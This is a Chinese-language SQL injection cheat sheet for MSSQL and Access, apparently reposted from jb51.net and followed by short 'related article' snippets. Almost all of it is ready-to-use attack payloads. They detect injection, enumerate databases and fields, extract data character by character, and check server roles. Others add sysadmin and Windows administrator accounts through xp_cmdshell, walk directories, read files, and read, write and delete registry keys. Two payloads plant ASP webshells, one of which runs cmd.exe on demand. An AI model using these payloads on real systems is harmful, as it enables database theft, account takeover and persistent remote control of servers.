1.判断是否有注入;and 1=1 ;and 1=2
2.初步判断是否是mssql ;and user>0
3.注入参数是字符'and [查询条件] and ''='
4.搜索时没过滤参数的'and [查询条件] and '%25'='
5.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
6.猜数据库 ;and (select Count(*) from [数据库名])>0
7.猜字段 ;and (select Count(字段名) from 数据库名)>0
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
10.测试权限结构(mssql)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(select IS_MEMBER('db_owner'));--
11.添加mssql和系统的帐户
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell 'net user username password
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
12.(1)遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)
(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容
13.mssql中的存储过程
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值
xp_regread 根键,子键,键值名
;exec xp_regread
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值
xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值
14.mssql的backup创建webshell
use model
create table cmd(str image);
insert into cmd(str) values ('<% Dim oScript %>');
backup database model to disk='c:\l.asp';
15.mssql内置函数
;and (select @@version)>0 获得Windows的版本号
;and user_name()='dbo' 判断当前系统的连接用户是不是sa
;and (select user_name())>0 爆当前系统的连接用户
;and (select db_name())>0 得到当前连接的数据库
16.简洁的webshell
use model
create table cmd(str image);
insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c
"&request("c")).stdout.readall%>');
backup database model to disk='g:\wwwtest\l.asp'
本文来自: 脚本之家(www.jb51.net) 详细出处参考:http://www.jb51.net/article/279.htm
分享到:
相关推荐
标题中的“全自动安装批处理.cmd /download”表明这是一个用于自动执行安装过程的命令脚本,通常在Windows操作系统中,批处理文件(.cmd)被用来批量执行一系列命令,简化复杂的手动操作。在这个场景下,它可能是...
### CTF中SQL注入常见题型整理 #### 前言 在网络安全竞赛(CTF)中,SQL注入是常见的攻击手法之一。通过对网站输入的数据进行构造,攻击者可以利用SQL注入漏洞获取敏感数据,甚至控制整个数据库。本文将详细介绍...
跨站脚本攻击(Cross-site scripting,简称XSS)是一种常见的网络安全漏洞,攻击者通过在网页中注入恶意脚本,当用户浏览该页面时,嵌入其中的脚本会被执行,从而达到恶意用户的特殊目的,如盗取用户数据、利用用户...
宏可以是单个命令,也可以是一系列命令的集合,通过录制或手动编写代码来创建。一旦创建,宏可以通过点击按钮、快捷键或者在特定事件触发时自动执行。 2. **非标设计与宏命令的结合** 在机械非标设计中,每个项目...
同时,数据库脚本的提供,意味着我们可以直接运行这些脚本来创建和初始化数据库,无需手动编写,大大简化了项目的部署过程。 在项目描述中,提到"详细写明了设计过程和设计思路,系统代码中含有大量的注释,方便...
这个场景下,标题和描述提及的方法就是一种解决方案,即通过源代码将Oracle数据库的表结构转换成带有注释的Excel文件。 首先,让我们深入理解这个过程的关键知识点: 1. **Oracle数据库表结构**:表结构是指数据库...
在“Ajax省市县联动脚本.sql”这个例子中,我们关注的是一个特定的应用场景:当用户选择一个省份时,城市和县的下拉列表会自动更新,无需用户手动刷新页面。 首先,让我们理解这个脚本的工作原理。...
另外,对用户输入的参数进行验证,防止命令注入攻击。 通过学习和掌握批处理技术,用户可以极大地提高工作效率,实现日常工作的自动化。在"最经典的50个批处理"这个压缩包中,可能包含了一系列实用的批处理脚本示例...
8. **安全考虑**:当在生产环境中使用Shell脚本时,要确保脚本的安全性,避免注入攻击,限制权限,且定期审计脚本内容。 通过理解这些知识点,你可以更好地利用shell脚本来自动化Tomcat的管理,提升工作效率,并且...
理解权限控制、避免命令注入、合理处理用户输入,是保证脚本安全的基本原则。 8. **学习资源与社区**:Raspberry Pi拥有庞大的开发者社区,提供了丰富的教程和论坛讨论。遇到问题时,可以参考官方文档或社区中的...
在网络安全领域,XSS(Cross-Site Scripting)和SQL注入是两种常见的攻击方式,对网站的安全性构成严重威胁。本文将详细介绍如何通过JavaScript特殊字符过滤正则表达式来防范这两种攻击。 首先,理解XSS攻击。XSS...
这些变量在处理用户输入和页面交互时非常有用,但使用时需要注意安全问题,如防止SQL注入和跨站脚本攻击。 **其他知识点** PHP还提供了许多处理数组的内置函数,如`array_combine()`用于合并两个数组创建新数组,`...
3.6.3注入脚本化bean的属性 3.6.4刷新脚本化bean 3.6.5编写内嵌的脚本化bean 3.7小结 第4章通知bean 4.1aop简介 4.1.1定义aop术语 4.1.2spring对aop的支持 4.2创建典型的spring切面 4.2.1创建通知 4.2.2...
3.6.3 注入脚本化Bean的属性 3.6.4 刷新脚本化Bean 3.6.5 编写内嵌的脚本化Bean 3.7 小结 第4章 通知Bean 4.1 AOP简介 4.1.1 定义AOP术语 4.1.2 Spring对AOP的支持 4.2 创建典型的Spring切面 4.2.1 创建...
3.6.3 注入脚本化Bean的属性 3.6.4 刷新脚本化Bean 3.6.5 编写内嵌的脚本化Bean 3.7 小结 第4章 通知Bean 4.1 AOP简介 4.1.1 定义AOP术语 4.1.2 Spring对AOP的支持 4.2 创建典型的Spring切面 4.2.1 创建...